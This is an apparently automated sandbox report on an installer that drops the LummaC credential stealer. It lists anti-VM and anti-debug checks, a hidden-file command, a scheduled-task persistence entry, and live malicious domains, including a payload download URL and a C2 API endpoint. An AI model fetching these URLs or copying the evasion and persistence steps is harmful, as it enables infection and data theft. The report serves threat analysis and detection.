Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SEleCt * FrOm wIN32_CoMPuTeRsySteM

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exe

Code function: 10_2_00FF6CE2 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW,

10_2_00FF6CE2

Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exe

Code function: 10_2_00FF7904 __EH_prolog,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW,

10_2_00FF7904

Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exe

Code function: 10_2_00FFA0D3 GetSystemInfo,

10_2_00FFA0D3

Source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000004.00000003.1445564914.0000000000922000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW+L
Source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000001.00000002.1255229595.0000000000948000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: &Ven_NECVMWar&Prod_VMware_SA]~'9_
Source: taskshostw.exe, 00000016.00000003.2037241269.0000000000814000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWp
Source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000001.00000002.1255229595.00000000008D8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\E
Source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000004.00000003.1445564914.0000000000922000.00000004.00000020.00020000.00000000.sdmp, Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000004.00000003.1445564914.00000000008E6000.00000004.00000020.00020000.00000000.sdmp, taskshostw.exe, 00000011.00000003.1514392072.0000000000746000.00000004.00000020.00020000.00000000.sdmp, taskshostw.exe, 00000011.00000003.1497163107.0000000000741000.00000004.00000020.00020000.00000000.sdmp, taskshostw.exe, 00000011.00000002.1517836410.0000000000747000.00000004.00000020.00020000.00000000.sdmp, taskshostw.exe, 00000011.00000003.1515259411.00000000006F2000.00000004.00000020.00020000.00000000.sdmp, taskshostw.exe, 00000016.00000003.2037241269.0000000000847000.00000004.00000020.00020000.00000000.sdmp, taskshostw.exe, 00000016.00000003.2019166935.000000000083D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW

Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe

Code function: 22_2_03FB1FCB rdtsc

22_2_03FB1FCB

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe

Code function: 17_2_00444660 LdrInitializeThunk,

17_2_00444660

Contains functionality to dynamically determine API calls

Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exe

Code function: 10_2_01078180 GetCurrentProcessId,GetCurrentThreadId,LoadLibraryW,GetProcAddress,FreeLibrary,GetTickCount,QueryPerformanceCounter,GetTickCount,

10_2_01078180

Contains functionality to read the PEB

Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 22_2_03FB2720 mov ebx, dword ptr fs:[00000030h]	22_2_03FB2720
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 22_2_03FB2ADA mov edx, dword ptr fs:[00000030h]	22_2_03FB2ADA
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 22_2_03FB1227 mov edx, dword ptr fs:[00000030h]	22_2_03FB1227
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 22_2_03FB65CC mov edx, dword ptr fs:[00000030h]	22_2_03FB65CC
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 22_2_03FB39C3 mov eax, dword ptr fs:[00000030h]	22_2_03FB39C3
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 22_2_03FC0D30 mov eax, dword ptr fs:[00000030h]	22_2_03FC0D30
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 22_2_03FC0D1D mov eax, dword ptr fs:[00000030h]	22_2_03FC0D1D

HIPS / PFW / Operating System Protection Evasion

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Process created: C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exe "C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exe" /verysilent /sp-			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\attrib.exe attrib +h +S "C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe"			Jump to behavior

Language, Device and Operating System Detection

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exe

Code function: 10_2_010958D0 cpuid

10_2_010958D0

Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exe

Code function: 10_2_00FFAFFD GetSystemTimeAsFileTime,

10_2_00FFAFFD

Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exe

Code function: 10_2_0102CFFF GetVersionExW,

10_2_0102CFFF

Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: 17.3.taskshostw.exe.2990000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.taskshostw.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.3.taskshostw.exe.2990000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000002.1515993134.0000000000400000.00000040.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000003.1470597131.0000000002990000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: 17.3.taskshostw.exe.2990000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.taskshostw.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.3.taskshostw.exe.2990000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000002.1515993134.0000000000400000.00000040.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000003.1470597131.0000000002990000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	1 Spearphishing Link	11 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	3 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	1 DLL Search Order Hijacking	1 DLL Search Order Hijacking	4 Obfuscated Files or Information	LSASS Memory	3 File and Directory Discovery	Remote Desktop Protocol	2 Clipboard Data	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	12 Command and Scripting Interpreter	1 Scheduled Task/Job	1 Access Token Manipulation	2 Software Packing	Security Account Manager	27 System Information Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 Scheduled Task/Job	Login Hook	11 Process Injection	1 DLL Side-Loading	NTDS	221 Security Software Discovery	Distributed Component Object Model	Input Capture	115 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	1 Scheduled Task/Job	1 DLL Search Order Hijacking	LSA Secrets	2 Virtualization/Sandbox Evasion	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Masquerading	Cached Domain Credentials	1 Process Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	2 Virtualization/Sandbox Evasion	DCSync	2 System Owner/User Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Access Token Manipulation	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	11 Process Injection	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Magic_V_pro_setup_stable_latest_release_version_9_709.exe	3%	Virustotal		Browse
Magic_V_pro_setup_stable_latest_release_version_9_709.exe	3%	ReversingLabs

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Programs\Common\willrandom.exe	100%	Avira	TR/AVI.Lumma.jtxjg
C:\Users\user\AppData\Local\Programs\Common\willrandom.exe	67%	ReversingLabs	Win32.Spyware.Lummastealer
C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\is-QC304.tmp\_isetup\_setup64.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\is-QC304.tmp\idp.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\_isetup\_setup64.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exe	0%	ReversingLabs

Source	Detection	Scanner	Label
https://rea.grupolalegion.ec/R	100%	Avira URL Cloud	malware
http://jrsoftware.github.io/issrc/ISHelper/isxfunc.xml	0%	Avira URL Cloud	safe
https://rea.grupolalegion.ec/willrandom.zipU	100%	Avira URL Cloud	malware
http://www.freepdfeditor.net	0%	Avira URL Cloud	safe
https://willpowerwav.site/	100%	Avira URL Cloud	malware
https://rea.grupolalegion.ec/willrandom.zip	100%	Avira URL Cloud	malware
http://www.kymoto.org0	0%	Avira URL Cloud	safe
https://rea.grupolalegion.ec/willrandom.zipq	100%	Avira URL Cloud	malware
http://www.freepdfeditor.netopenU	0%	Avira URL Cloud	safe
https://willpowerwav.site/api	100%	Avira URL Cloud	malware
https://rea.grupolalegion.ec/willrandom.zipWW	100%	Avira URL Cloud	malware
http://www.kymoto.orgq	0%	Avira URL Cloud	safe
https://rea.grupolalegion.ec/	100%	Avira URL Cloud	malware
https://willpowerwav.site/Y	100%	Avira URL Cloud	malware
http://www.microsoft.co(	0%	Avira URL Cloud	safe
http://127.0.0.1/innosetup/index.htm	0%	Avira URL Cloud	safe
https://willpowerwav.site/apiF	100%	Avira URL Cloud	malware
https://willpowerwav.site:443/api	100%	Avira URL Cloud	malware
https://willpowerwav.site/apix	100%	Avira URL Cloud	malware
https://willpowerwav.site/:	100%	Avira URL Cloud	malware
willpowerwav.site	100%	Avira URL Cloud	malware
http://www.freepdfeditor.netj	0%	Avira URL Cloud	safe
http://schemas.microsoft.coa7H	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
rea.grupolalegion.ec	190.92.154.206	true	false	high
tinyurl.com	104.18.111.161	true	false	high
rentry.org	164.132.58.105	true	false	high
willpowerwav.site	172.67.194.165	true	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
subawhipnator.life	false		high
boltetuurked.digital	false		high
https://rea.grupolalegion.ec/willrandom.zip	false	Avira URL Cloud: malware	unknown
https://willpowerwav.site/api	true	Avira URL Cloud: malware	unknown
presentymusse.world	false		high
hobbyedsmoker.live	false		high
privileggoe.live	false		high
https://tinyurl.com/y7yju2tp	false		high
uncertainyelemz.bet	false		high
deaddereaste.today	false		high
https://rentry.org/cc3ba8b679c926fc9911aede9009e589cbd3667c48439c630418d27fdbb52fc8/raw	false		high
willpowerwav.site	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.freepdfeditor.net	taskshostw.exe, 00000011.00000000.1406495324.0000000000401000.00000020.00000001.01000000.00000010.sdmp, taskshostw.exe, 00000011.00000003.1471284343.0000000002A91000.00000004.00000800.00020000.00000000.sdmp, willrandom.exe.10.dr	false	Avira URL Cloud: safe	unknown
http://www.innosetup.com/	Magic_V_pro_setup_stable_latest_release_version_9_709.exe, 00000000.00000003.1188417484.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Magic_V_pro_setup_stable_latest_release_version_9_709.exe, 00000000.00000003.1188850208.000000007F2B0000.00000004.00001000.00020000.00000000.sdmp, Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000001.00000000.1190034354.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Magic_V_pro_setup_stable_latest_release_version_9_709.tmp.0.dr, Magic_V_pro_setup_stable_latest_release_version_9_709.tmp.3.dr	false		high
https://www.cloudflare.com/learning/access-management/phishing-attack/	taskshostw.exe, 00000011.00000003.1514392072.0000000000746000.00000004.00000020.00020000.00000000.sdmp, taskshostw.exe, 00000011.00000003.1497163107.0000000000741000.00000004.00000020.00020000.00000000.sdmp, taskshostw.exe, 00000011.00000002.1517836410.0000000000784000.00000004.00000020.00020000.00000000.sdmp, taskshostw.exe, 00000011.00000003.1514392072.0000000000783000.00000004.00000020.00020000.00000000.sdmp, taskshostw.exe, 00000016.00000003.2019097864.000000000088E000.00000004.00000020.00020000.00000000.sdmp, taskshostw.exe, 00000016.00000003.2037241269.0000000000852000.00000004.00000020.00020000.00000000.sdmp, taskshostw.exe, 00000016.00000003.2019166935.000000000083D000.00000004.00000020.00020000.00000000.sdmp, taskshostw.exe, 00000016.00000003.2037241269.000000000088B000.00000004.00000020.00020000.00000000.sdmp, taskshostw.exe, 00000016.00000003.2019166935.0000000000858000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.freepdfeditor.netopenU	taskshostw.exe, 00000011.00000000.1406495324.0000000000401000.00000020.00000001.01000000.00000010.sdmp, taskshostw.exe, 00000011.00000003.1471284343.0000000002A91000.00000004.00000800.00020000.00000000.sdmp, willrandom.exe.10.dr	false	Avira URL Cloud: safe	unknown
http://jrsoftware.github.io/issrc/ISHelper/isxfunc.xml	Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000001.00000003.1240754645.000000007F520000.00000004.00001000.00020000.00000000.sdmp, Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000001.00000003.1237949116.000000007F4C0000.00000004.00001000.00020000.00000000.sdmp, Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000004.00000003.1365963683.000000007E170000.00000004.00001000.00020000.00000000.sdmp, Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000004.00000003.1355623818.000000007D840000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://willpowerwav.site/	taskshostw.exe, 00000011.00000002.1517647139.000000000070B000.00000004.00000020.00020000.00000000.sdmp, taskshostw.exe, 00000011.00000003.1498087630.000000000070A000.00000004.00000020.00020000.00000000.sdmp, taskshostw.exe, 00000011.00000003.1498087630.0000000000710000.00000004.00000020.00020000.00000000.sdmp, taskshostw.exe, 00000011.00000003.1514392072.000000000070B000.00000004.00000020.00020000.00000000.sdmp, taskshostw.exe, 00000011.00000003.1514392072.000000000075A000.00000004.00000020.00020000.00000000.sdmp, taskshostw.exe, 00000011.00000002.1517836410.000000000075C000.00000004.00000020.00020000.00000000.sdmp, taskshostw.exe, 00000016.00000003.2037241269.0000000000866000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.kymoto.orgAbout	Magic_V_pro_setup_stable_latest_release_version_9_709.exe, 00000000.00000003.1262551658.00000000022DC000.00000004.00001000.00020000.00000000.sdmp, Magic_V_pro_setup_stable_latest_release_version_9_709.exe, 00000000.00000003.1187273002.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000001.00000003.1192524909.00000000033F0000.00000004.00001000.00020000.00000000.sdmp, Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000001.00000003.1250554977.0000000002489000.00000004.00001000.00020000.00000000.sdmp	false		high
http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU	Magic_V_pro_setup_stable_latest_release_version_9_709.exe	false		high
https://rea.grupolalegion.ec/R	Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000004.00000002.1448967985.000000000097F000.00000004.00000020.00020000.00000000.sdmp, Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000004.00000003.1445564914.000000000097C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://rea.grupolalegion.ec/willrandom.zipq	Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000004.00000003.1445564914.0000000000922000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://tinyurl.com/1	Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000004.00000002.1448967985.00000000008A8000.00000004.00000020.00020000.00000000.sdmp	false		high
https://tinyurl.com/l	Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000004.00000002.1448967985.00000000008A8000.00000004.00000020.00020000.00000000.sdmp	false		high
https://rea.grupolalegion.ec/willrandom.zipU	Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000004.00000003.1445564914.0000000000922000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.kymoto.org0	Magic_V_pro_setup_stable_latest_release_version_9_709.exe, 00000000.00000003.1262551658.00000000022DC000.00000004.00001000.00020000.00000000.sdmp, Magic_V_pro_setup_stable_latest_release_version_9_709.exe, 00000003.00000003.1453721155.0000000002241000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.kymoto.orgq	Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000001.00000003.1250554977.000000000246D000.00000004.00001000.00020000.00000000.sdmp, Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000004.00000003.1443446001.000000000240D000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://willpowerwav.site/Y	taskshostw.exe, 00000016.00000003.2019868052.0000000000824000.00000004.00000020.00020000.00000000.sdmp, taskshostw.exe, 00000016.00000003.2037241269.0000000000827000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.cloudflare.com/5xx-error-landing	taskshostw.exe, 00000011.00000003.1514392072.0000000000702000.00000004.00000020.00020000.00000000.sdmp, taskshostw.exe, 00000011.00000003.1514392072.0000000000746000.00000004.00000020.00020000.00000000.sdmp, taskshostw.exe, 00000011.00000003.1497163107.0000000000741000.00000004.00000020.00020000.00000000.sdmp, taskshostw.exe, 00000011.00000003.1497071497.0000000000786000.00000004.00000020.00020000.00000000.sdmp, taskshostw.exe, 00000016.00000003.2019868052.000000000081E000.00000004.00000020.00020000.00000000.sdmp, taskshostw.exe, 00000016.00000003.2019097864.000000000088E000.00000004.00000020.00020000.00000000.sdmp, taskshostw.exe, 00000016.00000003.2019166935.000000000083D000.00000004.00000020.00020000.00000000.sdmp	false		high
https://rea.grupolalegion.ec/willrandom.zipWW	Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000004.00000003.1417406355.0000000003F35000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.microsoft.co(	Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000004.00000003.1445564914.0000000000922000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://127.0.0.1/innosetup/index.htm	Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000001.00000003.1240754645.000000007F520000.00000004.00001000.00020000.00000000.sdmp, Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000001.00000003.1236181676.000000007F3D0000.00000004.00001000.00020000.00000000.sdmp, Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000004.00000003.1365963683.000000007E170000.00000004.00001000.00020000.00000000.sdmp, Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000004.00000003.1355623818.000000007D840000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://willpowerwav.site/apix	taskshostw.exe, 00000011.00000003.1514392072.000000000075E000.00000004.00000020.00020000.00000000.sdmp, taskshostw.exe, 00000011.00000002.1517836410.000000000075C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://rea.grupolalegion.ec/	Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000004.00000002.1448967985.000000000097F000.00000004.00000020.00020000.00000000.sdmp, Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000004.00000003.1445564914.000000000097C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://willpowerwav.site/apiF	taskshostw.exe, 00000016.00000002.2039469356.00000000007D8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://willpowerwav.site:443/api	taskshostw.exe, 00000016.00000003.2037241269.000000000083C000.00000004.00000020.00020000.00000000.sdmp, taskshostw.exe, 00000016.00000002.2039954771.0000000000840000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://willpowerwav.site/:	taskshostw.exe, 00000011.00000003.1514392072.000000000075A000.00000004.00000020.00020000.00000000.sdmp, taskshostw.exe, 00000011.00000002.1517836410.000000000075C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://bitbucket.org/mitrich_k/inno-download-plugin	Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000001.00000003.1240210545.0000000003610000.00000004.00001000.00020000.00000000.sdmp, Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000001.00000002.1254642443.000000000018F000.00000004.00000010.00020000.00000000.sdmp, idp.dll.1.dr, idp.dll.4.dr	false		high
http://schemas.microsoft.coa7H	Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000004.00000003.1443446001.0000000002482000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.remobjects.com/ps	Magic_V_pro_setup_stable_latest_release_version_9_709.exe, 00000000.00000003.1188417484.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Magic_V_pro_setup_stable_latest_release_version_9_709.exe, 00000000.00000003.1188850208.000000007F2B0000.00000004.00001000.00020000.00000000.sdmp, Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000001.00000000.1190034354.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Magic_V_pro_setup_stable_latest_release_version_9_709.tmp.0.dr, Magic_V_pro_setup_stable_latest_release_version_9_709.tmp.3.dr	false		high
http://www.freepdfeditor.netj	taskshostw.exe, 00000011.00000000.1406495324.0000000000401000.00000020.00000001.01000000.00000010.sdmp, taskshostw.exe, 00000011.00000003.1471284343.0000000002A91000.00000004.00000800.00020000.00000000.sdmp, willrandom.exe.10.dr	false	Avira URL Cloud: safe	unknown
https://tinyurl.com/	Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000004.00000003.1445564914.0000000000922000.00000004.00000020.00020000.00000000.sdmp	false		high
http://mitrichsoftware.wordpress.comB	Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000001.00000003.1240210545.0000000003610000.00000004.00001000.00020000.00000000.sdmp, Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000001.00000002.1254642443.000000000018F000.00000004.00000010.00020000.00000000.sdmp, idp.dll.1.dr, idp.dll.4.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
164.132.58.105	rentry.org	France	16276	OVHFR	false
190.92.154.206	rea.grupolalegion.ec	Argentina	10986	DesarrollosDigitalesdePulsarConsultingAR	false
104.18.111.161	tinyurl.com	United States	13335	CLOUDFLARENETUS	false
172.67.194.165	willpowerwav.site	United States	13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1632503
Start date and time:	2025-03-08 03:13:19 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 50s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	23
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Magic_V_pro_setup_stable_latest_release_version_9_709.exe
Detection:	MAL
Classification:	mal64.troj.evad.winEXE@23/12@4/4
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 88% Number of executed functions: 104 Number of non-executed functions: 208
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 23.60.203.209
Excluded domains from analysis (whitelisted): fs.microsoft.com, ctldl.windowsupdate.com, c.pki.goog
Execution Graph export aborted for target Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, PID 6800 because there are no executed function
Execution Graph export aborted for target taskshostw.exe, PID 8128 because it is empty
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
02:14:40	Task Scheduler	Run new task: WhatsAppSyncTaskMachineCore path: %localappdata%\programs\common\taskshostw.exe
21:14:29	API Interceptor	2x Sleep call for process: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp modified
21:14:49	API Interceptor	3x Sleep call for process: taskshostw.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
164.132.58.105	plugin-newest_release_.exe	Get hash	malicious	Unknown	Browse
	plugin-newest_release_.exe	Get hash	malicious	Unknown	Browse
	segura.vbs	Get hash	malicious	Remcos	Browse
	asegurar.vbs	Get hash	malicious	Remcos	Browse
	XS_Trade_AI-newest_release_.exe	Get hash	malicious	LummaC	Browse
	sims-4-updater-v1.3.4.exe	Get hash	malicious	Unknown	Browse
	RedEngine.exe	Get hash	malicious	Babadeda, RedLine	Browse
	setup.exe	Get hash	malicious	Babadeda, RHADAMANTHYS, RedLine	Browse
	8MO5hfPa8d.exe	Get hash	malicious	AsyncRAT, Clipboard Hijacker	Browse
	SecuriteInfo.com.HEUR.Trojan.MSIL.Agent.gen.12009.5536.exe	Get hash	malicious	AsyncRAT, Clipboard Hijacker	Browse
190.92.154.206	https://rea.grupolalegion.ec/p.php/1	Get hash	malicious	CAPTCHA Scam ClickFix, LummaC Stealer	Browse
	https://rea.grupolalegion.ec/p.php	Get hash	malicious	CAPTCHA Scam ClickFix	Browse
	https://rea.grupolalegion.ec/p.php	Get hash	malicious	Unknown	Browse
